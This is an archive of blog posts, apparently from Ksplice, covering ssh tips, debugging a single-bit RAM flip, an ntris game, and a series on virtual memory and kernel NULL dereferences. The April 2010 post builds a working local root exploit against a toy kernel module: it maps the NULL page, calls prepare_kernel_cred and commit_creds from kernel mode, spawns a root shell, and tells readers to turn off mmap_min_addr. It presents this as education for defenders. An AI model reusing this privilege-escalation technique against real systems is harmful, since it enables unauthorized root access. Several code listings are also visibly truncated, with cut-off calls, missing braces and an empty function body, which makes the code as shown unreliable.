  • Measuring latency. There's no better way to tell how long your application takes to talk to that remote server than watching it actually read() from the server, with strace -T as your stopwatch.
  • Identifying hot spots. Profilers are great, but they don't always reflect the structure of your program. And have you ever tried to profile a shell script? Sometimes the best data comes from sending a strace -tt run to a file, and picking through to see when each phase of your program started and finished.
  • As a teaching and learning tool. The user/kernel boundary is where almost everything interesting happens in your system. So if you want to know more about how your system really works -- how about curling up with a set of man pages and some output from strace?


Monday Jul 26, 2010

Six things I wish Mom told me (about ssh)

If you've ever seriously used a Linux system, you're probably already familiar with at least the basics of ssh. But you're hungry for more. In this post, we'll show you six ssh tips that'll help take you to the next level. (We've also found that they make for excellent cocktail party conversation talking points.)

(1) Take command!

Everyone knows that you can use ssh to get a remote shell, but did you know that you can also use it to run commands on their own? Well, you can--just stick the command name after the hostname! Case in point:

wdaher@rocksteady:~$ ssh bebop uname -a
Linux bebop 2.6.32-24-generic #39-Ubuntu SMP Wed Jul 28 05:14:15 UTC 2010 x86_64 GNU/Linux

Combine this with passwordless ssh logins, and your shell scripting powers have just leveled up. Want to figure out what version of Python you have installed on each of your systems? Just stick ssh hostname python -V in a for loop, and you're done!

Some commands, however, don't play along so nicely:

wdaher@rocksteady:~$ ssh bebop top
TERM environment variable not set.

What gives? Some programs need a pseudo-tty, and aren't happy if they don't have one (anything that wants to draw on arbitrary parts of the screen probably falls into this category). But ssh can handle this too--the -t option will force ssh to allocate a pseudo-tty for you, and then you'll be all set.

# Revel in your process-monitoring glory
wdaher@rocksteady:~$ ssh bebop -t top
# Or, resume your session in one command, if you're a GNU Screen user
wdaher@rocksteady:~$ ssh bebop -t screen -dr

(2) Please, try a sip of these ports

But wait, there's more! ssh's ability to forward ports is incredibly powerful. Suppose you have a web dashboard at work that runs at analytics on port 80 and is only accessible from the inside the office, and you're at home but need to access it because it's 2 a.m. and your pager is going off.

Fortunately, you can ssh to your desktop at work, desktop, which is on the same network as analytics. So if we can connect to desktop, and desktop can connect to analytics, surely we can make this work, right?

Right. We'll start out with something that doesn't quite do what we want:

wdaher@rocksteady:~$ ssh desktop -L 8080:desktop:80

OK, the ssh desktop is the straightforward part. The -L port:hostname:hostport option says "Set up a port forward from port (in this case, 8080) to hostname:hostport (in this case, desktop:80)."

So now, if you visit http://localhost:8080/ in your web browser at home, you'll actually be connected to port 80 on desktop. Close, but not quite! Remember, we wanted to connect to the web dashboard, running on port 80, on analytics, not desktop.

All we do, though, is adjust the command like so:

wdaher@rocksteady:~$ ssh desktop -L 8080:analytics:80

Now, the remote end of the port forward is analytics:80, which is precisely where the web dashboard is running. But wait, isn't analytics behind the firewall? How can we even reach it? Remember: this connection is being set up on the remote system (desktop), which is the only reason it works.

If you find yourself setting up multiple such forwards, you're probably better off doing something more like:

wdaher@rocksteady:~$ ssh -D 8080 desktop

This will set up a SOCKS proxy at localhost:8080. If you configure your browser to use it, all of your browser traffic will go over SSH and through your remote system, which means you could just navigate to http://analytics/ directly.

(3) Til-de do us part

Riddle me this: ssh into a system, press Enter a few times, and then type in a tilde. Nothing appears. Why?

Because the tilde is ssh's escape character. Right after a newline, you can type ~ and a number of other keystrokes to do interesting things to your ssh connection (like give you 30 extra lives in each continue.) ~? will display a full list of the escape sequences, but two handy ones are ~. and ~^Z.

~. (a tilde followed by a period) will terminate the ssh connection, which is handy if you lose your network connection and don't want to wait for your ssh session to time out.  ~^Z (a tilde followed by Ctrl-Z) will put the connection in the background, in case you want to do something else on the host while ssh is running. An example of this in action:

wdaher@rocksteady:~$ ssh bebop
wdaher@bebop:~$ sleep 10000
wdaher@bebop:~$ ~^Z [suspend ssh]

[1]+  Stopped                 ssh bebop
wdaher@rocksteady:~$ # Do something else
wdaher@rocksteady:~$ fg # and you're back!

(4) Dusting for prints

I'm sure you've seen this a million times, and you probably just type "yes" without thinking twice:

wdaher@rocksteady:~$ ssh bebop
The authenticity of host 'bebop (' can't be established.
RSA key fingerprint is a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68.
Are you sure you want to continue connecting (yes/no)?

What's actually going on here? Well, if this is your first time connecting to bebop, you can't really tell whether the machine you're talking to is actually bebop, or just an impostor pretending to be bebop. All you know is the key fingerprint of the system you're talking to.  In principle, you're supposed to verify this out-of-band (i.e. call up the remote host and ask them to read off the fingerprint.)

Let's say you and your incredibly security-minded friend actually want to do this. How does one actually find this fingerprint? On the remote host, have your friend run:

sbaker@bebop:~$ ssh-keygen -l -f /etc/ssh/
2048 a2:6d:2f:30:a3:d3:12:9d:9d:da:0c:a7:a4:60:20:68 /etc/ssh/ (RSA)

Tada! They match, and it's safe to proceed. From now on, this is stored in your list of ssh "known hosts" (in ~/.ssh/known_hosts), so you don't get the prompt every time. And if the key ever changes on the other end, you'll get an alert--someone's trying to read your traffic! (Or your friend reinstalled their system and didn't preserve the key.)

(5) Losing your keys

Unfortunately, some time later, you and your friend have a falling out (something about Kirk vs. Picard), and you want to remove their key from your known hosts. "No problem," you think, "I'll just remove it from my list of known hosts." You open up the file and are unpleasantly surprised: a jumbled file full of all kinds of indecipherable characters. They're actually hashes of the hostnames (or IP addresses) that you've connected to before, and their associated keys.

Before you proceed, surely you're asking yourself: "Why would anyone be so cruel? Why not just list the hostnames in plain text, so that humans could easily edit the file?" In fact, that's actually how it was done until very recently. But it turns out that leaving them in the clear is a potential security risk, since it provides an attacker a convenient list of other places you've connected (places where, e.g., an unwitting user might have used the same password).

Fortunately, ssh-keygen -R <hostname> does the trick:

wdaher@rocksteady:~$ ssh-keygen -R bebop
/home/wdaher/.ssh/known_hosts updated.
Original contents retained as /home/wdaher/.ssh/known_hosts.old

I'm told there's still no easy way to remove now-bitter memories of your friendship together, though.

(6) A connection by any other name...

If you've read this far, you're an ssh pro. And like any ssh pro, you log into a bajillion systems, each with their own usernames, ports, and long hostnames. Like your accounts at AWS, Rackspace Cloud, your dedicated server, and your friend's home system.

And you already know how to do this. username@host or -l username to specify your username, and -p portnumber to specify the port:

wdaher@rocksteady:~$ ssh -p 2222
wdaher@rocksteady:~$ ssh -p 8183
wdaher@rocksteady:~$ ssh -p 31337 -l waseemio

But this gets really old really quickly, especially when you need to pass a slew of other options for each of these connections. Enter .ssh/config, a file where you specify convenient aliases for each of these sets of settings:

Host bob
    Port 2222
    User wdaher

Host alice
    Port 8183
    User waseem

Host self
    Port 31337
    User waseemio

So now it's as simple as:

wdaher@rocksteady:~$ ssh bob
wdaher@rocksteady:~$ ssh alice
wdaher@rocksteady:~$ ssh self
And yes, the config file lets you specify port forwards or commands to run as well, if you'd like--check out the ssh_config manual page for the details.

ssh! It's (not) a secret

This list is by no means exhaustive, so I turn to you: what other ssh tips and tricks have you learned over the years? Leave ’em in the comments!


Thursday Jun 24, 2010

Attack of the Cosmic Rays!

It's a well-documented fact that RAM in modern computers is susceptible to occasional random bit flips due to various sources of noise, most commonly high-energy cosmic rays. By some estimates, you can even expect error rates as high as one error per 4GB of RAM per day! Many servers these days have ECC RAM, which uses extra bits to store error-correcting codes that let them correct most bit errors, but ECC RAM is still fairly rare in desktops, and unheard-of in laptops.

For me, bitflips due to cosmic rays are one of those problems I always assumed happen to "other people". I also assumed that even if I saw random cosmic-ray bitflips, my computer would probably just crash, and I'd never really be able to tell the difference from some random kernel bug.

A few weeks ago, though, I encountered some bizarre behavior on my desktop, that honestly just didn't make sense. I spent about half an hour digging to discover what had gone wrong, and eventually determined, conclusively, that my problem was a single undetected flipped bit in RAM. I can't prove whether the problem was due to cosmic rays, bad RAM, or something else, but in any case, I hope you find this story interesting and informative.

The problem

The symptom that I observed was that the expr program, used by shell scripts to do basic arithmetic, had started consistently segfaulting. This first manifested when trying to build a software project, since the GNU autotools make heavy use of this program:

[nelhage@psychotique]$ autoreconf -fvi
autoreconf: Entering directory `.'
autoreconf: not using Gettext
autoreconf: running: aclocal --force -I m4
autoreconf: tracing
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault
Segmentation fault

dmesg revealed that the segfaulting program was expr:

psychotique kernel: [105127.372705] expr[7756]: segfault at 1a70 ip 0000000000001a70 sp 00007fff2ee0cc40 error 4 in expr

And I was easily able to reproduce the problem by hand:

[nelhage@psychotique]$ expr 3 + 3
Segmentation fault

expr definitely hadn't been segfaulting as of a day ago or so, so something had clearly gone suddenly, and strangely, wrong. I had no idea what, but I decided to find out.

Check the dumb things

I run Ubuntu, so the first things I checked were the /var/log/dpkg.log and /var/log/aptitude.log files, to determine whether any suspicious packages had been upgraded recently. Perhaps Ubuntu accidentally let a buggy package slip into the release. I didn't recall doing any significant upgrades, but maybe dependencies had pulled in an upgrade I had missed.

The logs revealed I hadn't upgraded anything of note in the last several days, so that theory was out.

Next up, I checked env | grep ^LD. The dynamic linker takes input from a number of environment variables, all of whose names start with LD_. Was it possible I had somehow ended up setting some variable that was messing up the dynamic linker, causing it to link a broken library or something?

[nelhage@psychotique]$ env | grep ^LD

That, too, turned up nothing.

Start digging

I was fortunate in that, although this failure is strange and sudden, it seemed perfectly reproducible, which means I had the luxury of being able to run as many tests as I wanted to debug it.

The problem is a segfault, so I decided to pull up a debugger and figure out where it's segfaulting. First, though, I'd want debug symbols, so I could make heads or tails of the crashed program. Fortunately, Ubuntu provides debug symbols for every package they ship, in a separate repository. I already had the debug sources enabled, so I used dpkg -S to determine that expr belongs to the coreutils package:

[nelhage@psychotique]$ dpkg -S $(which expr)
coreutils: /usr/bin/expr

And installed the coreutils debug symbols:

[nelhage@psychotique]$ sudo aptitude install coreutils-dbgsym

Now, I could run expr inside gdb, catch the segfault, and get a stack trace:

[nelhage@psychotique]$ gdb --args expr 3 + 3
(gdb) run
Starting program: /usr/bin/expr 3 + 3
Program received signal SIGSEGV, Segmentation fault.
0x0000000000001a70 in ?? ()
(gdb) bt
#0  0x0000000000001a70 in ?? ()
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
#2  0x00000000004027dd in eval4 (evaluate=true) at expr.c:773
#3  0x000000000040291d in eval3 (evaluate=true) at expr.c:812
#4  0x000000000040208d in eval2 (evaluate=true) at expr.c:842
#5  0x0000000000402280 in eval1 (evaluate=<value optimized out>) at expr.c:921
#6  0x0000000000402320 in eval (evaluate=<value optimized out>) at expr.c:952
#7  0x0000000000402da5 in main (argc=2, argv=0x0) at expr.c:329

So, for some reason, the eval5 function has jumped off into an invalid memory address, which of course causes a segfault. Repeating the test a few time confirmed that the crash was totally deterministic, with the same stack trace each time. But what is eval5 trying to do that's causing it to jump off into nowhere? Let's grab the source and find out:

[nelhage@psychotique]$ apt-get source coreutils
[nelhage@psychotique]$ cd coreutils-7.4/src/
[nelhage@psychotique]$ gdb --args expr 3 + 3
# Run gdb, wait for the segfault
(gdb) up
#1  0x0000000000402782 in eval5 (evaluate=true) at expr.c:745
745           if (nextarg (":"))
(gdb) l
740       trace ("eval5");
741     #endif
742       l = eval6 (evaluate);
743       while (1)
744         {
745           if (nextarg (":"))
746             {
747               r = eval6 (evaluate);
748               if (evaluate)
749                 {

I used the apt-get source command to download the source package from Ubuntu, and ran gdb in the source directory, so it could find the files referred to by the debug symbols. I then used the up command in gdb to go up a stack frame, to the frame where eval5 called off into nowhere.

From the source, we see that eval5 is trying to call the nextarg function. `gdb` will happily tell us where that function is supposed to be located:

(gdb) p nextarg
$1 = {_Bool (const char *)} 0x401a70 <nextarg>

Comparing that address with the address in the stack trace above, we see that they differ by a single bit. So it appears that somewhere a single bit has been flipped, causing that call to go off into nowhere.

But why?

So there's a flipped bit. But why, and how did it happen? First off, let's determine where the problem is. Is it in the expr binary itself, or is something more subtle going on?

[nelhage@psychotique]$ debsums coreutils | grep FAILED
/usr/bin/expr                                                             FAILED

The debsums program will compare checksums of files on disk with a manifest contained in the Debian package they came from. In this case, examining the coreutils package, we see that the expr binary has in fact been modified since it was installed. We can verify how it's different by downloading a new version of the package, and comparing the files:

[nelhage@psychotique]$ aptitude download coreutils
[nelhage@psychotique]$ mkdir coreutils
[nelhage@psychotique]$ dpkg -x coreutils_7.4-2ubuntu1_amd64.deb coreutils
[nelhage@psychotique]$ cmp -bl coreutils/usr/bin/expr /usr/bin/expr
 10113 377 M-^? 277 M-?

aptitude download downloads a .deb package, instead of actually doing the installation. I used dpkg -x to just extract the contents of the file, and cmp to compare the packaged expr with the installed one. -b tells cmp to list any bytes that differ, and -l tells it to list all differences, not just the first one. So we can see that two bytes differ, and by a single bit, which agrees with the failure we saw. So somehow the installed expr binary is corrupted.

So how did that happen? We can check the mtime ("modified time") field on the program to determine when the file on disk was modified (assuming, for the moment, that whatever modified it didn't fix up the mtime, which seems unlikely):

[nelhage@psychotique]$ ls -l /usr/bin/expr
-rwxr-xr-x 1 root root 111K 2009-10-06 07:06 /usr/bin/expr*

Curious. The mtime on the binary is from last year, presumably whenever it was built by Ubuntu, and set by the package manager when it installed the system. So unless something really fishy is going on, the binary on disk hasn't been touched.

Memory is a tricky thing.

But hold on. I have 12GB of RAM on my desktop, most of which, at any moment, is being used by the operating system to cache the contents of files on disk. expr is a pretty small program, and frequently used, so there's a good chance it will be entirely in cache, and my OS has basically never touched the disk to load it, since it first did so, probably when I booted my computer. So it's likely that this corruption is entirely in memory. But how can we test that? Simple: by forcing the OS to discard the cached version and re-read it from disk.

On Linux, we can do this by writing to the /proc/sys/vm/drop_caches file, as root. We'll take a checksum of the binary first, drop the caches, and compare the checksum after forcing it to be re-read:

[nelhage@psychotique]$ sha256sum /usr/bin/expr
4b86435899caef4830aaae2bbf713b8dbf7a21466067690a796fa05c363e6089  /usr/bin/expr
[nelhage@psychotique]$ echo 3 | sudo tee /proc/sys/vm/drop_caches
[nelhage@psychotique]$ sha256sum /usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  /usr/bin/expr
[nelhage@psychotique]$ sha256sum coreutils/usr/bin/expr
5dbe7ab7660268c578184a11ae43359e67b8bd940f15412c7dc44f4b6408a949  coreutils/usr/bin/expr

And behold, the file changed. The corruption was entirely in memory. And, furthermore, expr no longer segfaults, and matches the version I downloaded earlier.

(The sudo tee idiom is a common one I used to write to a file as root from a normal user shell. sudo echo 3 > /proc/sys/vm/drop_caches of course won't work because the file is still opened for writing by my shell, which doesn't have the required permissions).


As I mentioned earlier, I can't prove this was due to a cosmic ray, or even a hardware error. It could have been some OS bug in my kernel that accidentally did a wild write into my memory in a way that only flipped a single bit. But that'd be a pretty weird bug.

And in fact, since that incident, I've had several other, similar problems. I haven't gotten around to memtesting my machine, but that does suggest I might just have a bad RAM chip on my hands. But even with bad RAM, I'd guess that flipped bits come from noise somewhere -- they're just susceptible to lower levels of noise. So it could just mean I'm more susceptible to the low-energy cosmic rays that are always falling. Regardless of whatever the cause was, though, I hope this post inspires you to think about the dangers of your RAM corrupting your work, and that the tale of my debugging helps you learn some new tools that you might find useful some day.

Now that I've written this post, I'm going to go memtest my machine and check prices on ECC RAM. In the meanwhile, leave your stories in the comments -- have you ever tracked a problem down to memory corruption? What are your practices for coping with the risk of these problems?


Edited to add a note that this could well just be bad RAM, in addition to a one-off cosmic-ray event.

Wednesday Jun 16, 2010

ntris: an idea taken a step too far

About nine months ago, I lost a lot of free time to a little applet called Pentris. The addition of pentomino pieces made the gameplay quite different from the original falling block game, but I couldn't help but think that Pentris didn't go far enough. As a programmer, I had to implement the natural generalization of the game. After a much longer development cycle than I had originally anticipated, ntris is now ready. (You'll need Java to run the applet.)

In ntris, as your score increases, so does the probability that you will get increasingly large polyominoes. At the beginning, you'll only get pieces made of 1-5 squares. By the time your score gets to 100, about one piece in three will be a hexomino - and that's still just the beginning. Very few of my beta-testers have survived long enough to see a decomino. The current high is 421, by wuthefwasthat - can you beat it?

Here's a few of my most feared pieces.

You don't want to see these in your queue.
You don't want to see these in your queue.

Everyone who plays ntris is familiar with these pieces. From left to right: the mine, whose rotational symmetry and hot pink color make a deadly combination; the jerk, and its close relative, the donut, which are the smallest pieces with non-trivial homotopy; and the dog, one of the pieces I call "animals", for obvious reasons.

I've also implemented a multiplayer mode in which you can face off against another player. In play-testing, I found that a large polyomino was a much more intimidating attack than the usual garbage, so clearing lines sends larger pieces to your opponents. I think multiplayer ntris offers something no other game does: the satisfaction of making your opponent play a monstrous nonomino. They're not clearing lines anytime soon.

Dealing with a massive piece.

When you just start out playing ntris, there are a few things you should remember.

  • Don't be too greedy. Creating a deep empty column is a sure way to lose.
  • Pay attention to your queue. Plan ahead when you see a large piece coming.
  • You can hold a bad piece if you can't place it, but don't keep it there too long.
  • Use singletons to fix your board. Maneuver them into holes and bad spots.

I should also tell you about a more advanced ntris technique, "laying it across", which is a key element of higher-level play.

Lay it across

What makes ntris different from Tetris, Blockles, and Pentris? Some simple math reveals a major gameplay difference between ntris and the other games. Let's look at Tetris first. The playing field is 10 columns wide, and each piece takes up four squares. That means that, asymptotically, you have to clear 4/10 of a line with each drop. Suppose that you use a standard open column strategy and only clear lines with 4-longs. Each one clears 4 lines, and there are 6 other tetrominoes, so, you clear, on average, 4/7 of a line per piece - enough to stay alive.

At the start of ntris, you could get any of the 29 pieces made of 1-5 squares. These pieces have, on average, 4.38 squares per piece. The board is 12 columns wide, so you have to clear 4.38/12 = 0.365 lines per drop. If you use only straight pieces to clear lines, you clear on average 15 lines every 29 pieces, or 0.517 lines per piece. But clearing multiple lines at a time yields large score bonuses, so if you're greedy, you'll only clear lines when you get a 4-long or a 5-long. Naiively, this means that you only clear 9 lines every 29 pieces - 0.310 lines per piece - so you are bound to lose.

The solution is skimming, or clearing lines with the horizontal parts of your pieces. By skimming, you can clear four lines with the long-L-block and the long-J-block, as well as with the 4-long.

Skimming a long-L-block.

Similarly, when you start getting hexominoes, you can clear five lines with more than just the 5-long. If you do the math, you'll see that with a score over 100, you must use some form of skimming just to clear lines fast enough to survive. When you start to get even larger blocks, you'll have to take skimming to an extreme to deal with them. Here's a good example of how you "lay it across":

a) A nasty piece. b) Lay it across. c) Play more pieces on the same line. d) The play resolves.

To lay a piece across, play the piece such that most of it falls on a single horizontal line. Clear that line with the next few pieces. Laying it across can be counter-intuitive, since it often creates several holes in your board, but it is often the only viable way to play a piece. A word of caution: before laying a piece across, you should always think ahead a few moves, to be sure that the play will resolve quickly. Otherwise, you run the risk of covering part of your board with the piece that wouldn't go away.

Your move

I'm only an average ntris player, and we have just scratched the surface of ntris strategy. Many of you will be much better than me at this game. The server is always running, and I promise this game isn't as hard as it might seem. Can you get the high score in ntris?

Please note: ntris is my personal project and is not affiliated with or endorsed by Ksplice or the makers of Tetris. Please see for more information about Tetris.


Monday Apr 12, 2010

Much ado about NULL: Exploiting a kernel NULL dereference

Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module.

A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same.


In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11.

Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing.

While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root.

If we build and load the nullderef module, and execute

echo 1 > /sys/kernel/debug/nullderef/null_read

our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg):

BUG: unable to handle kernel NULL pointer dereference at 00000000

IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef]

The kernel address space

e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it?

For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing.

In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it.

A diagram of virtual memory and memory protection
A diagram of virtual memory and memory protection

Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program.

This all has at least two important consequence for exploiting NULL pointer dereferences:

First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process!

Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode.

We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:

(As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.)

#include <sys/mman.h>
#include <stdio.h>
#include <fcntl.h>

int main() {
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY);
  write(fd, "1", 1);

  printf("Triggered a kernel NULL pointer dereference!\n");
  return 0;

Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit.

Putting it together

To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic.

So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory.

We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses)

struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions.

Putting it together, we get:

#include <sys/mman.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

struct cred;
struct task_struct;

typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon)
typedef int (*commit_creds_t)(struct cred *new)

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

/* Find a kernel symbol in /proc/kallsyms */
void *get_ksym(char *name) {
    FILE *f = fopen("/proc/kallsyms", "rb");
    char c, sym[512];
    void *addr;
    int ret;

    while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
        if (!strcmp(sym, name))
            return addr;
    return NULL;

/* This function will be executed in kernel mode. */
void get_root(void) {

int main() {
  prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds        = get_ksym("commit_creds");

  if (!(prepare_kernel_cred && commit_creds)) {
      fprintf(stderr, "Kernel symbols not found. "
                      "Is your kernel older than 2.6.29?\n");

  /* Put a pointer to our function at NULL */
  mmap(0, 4096, PROT_READ|PROT_WRITE,
  void (**fn)(void) = NULL;
  *fn = get_root;

  /* Trigger the kernel */
  int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY);
  write(fd, "1", 1);

  if (getuid() == 0) {
      char *argv[] = {"/bin/sh", NULL};
      execve("/bin/sh", argv, NULL);

  fprintf(stderr, "Something went wrong?\n");
  return 1;

(struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.)

So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it.


One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild.

Monday Mar 29, 2010

Much ado about NULL: An introduction to virtual memory

Here at Ksplice, we're always keeping a very close eye on vulnerabilities that are being announced in Linux. And in the last half of last year, it was very clear that NULL pointer dereference vulnerabilities were the current big thing. Brad Spengler made it abundantly clear to anyone who was paying the least bit attention that these vulnerabilities, far more than being mere denial of service attacks, were trivially exploitable privilege escalation vulnerabilities. Some observers even dubbed 2009 the year of the kernel NULL pointer dereference.

If you've ever programmed in C, you've probably run into a NULL pointer dereference at some point. But almost certainly, all it did was crash your program with the dreaded "Segmentation Fault". Annoying, and often painful to debug, but nothing more than a crash. So how is it that this simple programming error becomes so dangerous when it happens in the kernel? Inspired by all the fuss, this post will explore a little bit of how memory works behind the scenes on your computer. By the end of today's installment, we'll understand how to write a C program that reads and writes to a NULL pointer without crashing. In a future post, I'll take it a step further and go all the way to showing how an attacker would exploit a NULL pointer dereference in the kernel to take control of a machine!

What's in a pointer?

There's nothing fundamentally magical about pointers in C (or assembly, if that's your thing). A pointer is just an integer, that (with the help of the hardware) refers to a location somewhere in that big array of bits we call a computer's memory. We can write a C program to print out a random pointer:

#include <stdio.h>
int main(int argc, char **argv) {
  printf("The argv pointer = %d\n", argv);
  return 0;

Which, if you run it on my machine, prints:

The argv pointer = 1680681096

(Pointers are conventionally written in hexadecimal, which would make that 0x642d2888, but that's just a notational thing. They're still just integers.)

NULL is only slightly special as a pointer value: if we look in stddef.h, we can see that it's just defined to be the pointer with value 0. The only thing really special about NULL is that, by convention, the operating system sets things up so that NULL is an invalid pointer, and any attempts to read or write through it lead to an error, which we call a segmentation fault. However, this is just convention; to the hardware, NULL is just another possible pointer value.

But what do those integers actually mean? We need to understand a little bit more about how memory works in a modern computer. In the old days (and still on many embedded devices), a pointer value was literally an index into all of the memory on those little RAM chips in your computer:

Diagram of Physical Memory Addresses
Mapping pointers directly to hardware memory

This was true for every program, including the operating system itself. You can probably guess what goes wrong here: suppose that Microsoft Word is storing your document at address 700 in memory. Now, you're browsing the web, and a bug in Internet Explorer causes it to start scribbling over random memory and it happens to scribble over memory around address 700. Suddenly, bam, Internet Explorer takes Word down with it. It's actually even worse than that: a bug in IE can even take down the entire operating system.

This was widely regarded as a bad move, and so all modern hardware supports, and operating systems use, a scheme called virtual memory. What this means it that every program running on your computer has its own namespace for pointers (from 0 to 232-1, on a 32-bit machine). The value 700 means something completely different to Microsoft Word and Internet Explorer, and neither can access the other's memory. The operating system is in charge of managing these so-called address spaces, and mapping different pieces of each program's address space to different pieces of physical memory.

A diagram of virtual memory

The world with Virtual Memory. Dark gray shows portions of the address space that refer to valid memory.


One feature of this setup is that while each process has its own 232 possible addresses, not all of them need to be valid (correspond to real memory). In particular, by default, the NULL or 0 pointer does not correspond to valid memory, which is why accessing it leads to a crash.

Because each application has its own address space, however, it is free to do with it as it wants. For instance, you're welcome to declare that NULL should be a valid address in your application. We refer to this as "mapping" the NULL page, because you're declaring that that area of memory should map to some piece of physical memory.

On Linux (and other UNIX) systems, the function call used for mapping regions of memory is mmap(2). mmap is defined as:

void *mmap(void *addr, size_t length, int prot, int flags,
           int fd, off_t offset);

Let's go through those arguments in order (All of this information comes from the man page):

This is the address where the application wants to map memory. If MAP_FIXED is not specified in flags, mmap may select a different address if the selected one is not available or inappropriate for some reason.
The length of the region the application wants to map. Memory can only be mapped in increments of a "page", which is 4k (4096 bytes) on x86 processors.
Short for "protection", this argument must be a combination of one or more of the values PROT_READ, PROT_WRITE, PROT_EXEC, or PROT_NONE, indicating whether the application should be able to read, write, execute, or none of the above, the mapped memory.
Controls various options about the mapping. There are a number of flags that can go here. Some interesting ones are MAP_PRIVATE, which indicates the mapping should not be shared with any other process, MAP_ANONYMOUS, which indicates that the fd argument is irrelevant, and MAP_FIXED, which indicates that we want memory located exactly at addr.
The primary use of mmap is not just as a memory allocator, but in order to map files on disk to appear in a process's address space, in which case fd refers to an open file descriptor to map. Since we just want a random chunk of memory, we're going pass MAP_ANONYMOUS in flags, which indicates that we don't want to map a file, and fd is irrelevant.
This argument would be used with fd to indicate which portion of a file we wanted to map.
mmap returns the address of the new mapping, or MAP_FAILED if something went wrong.

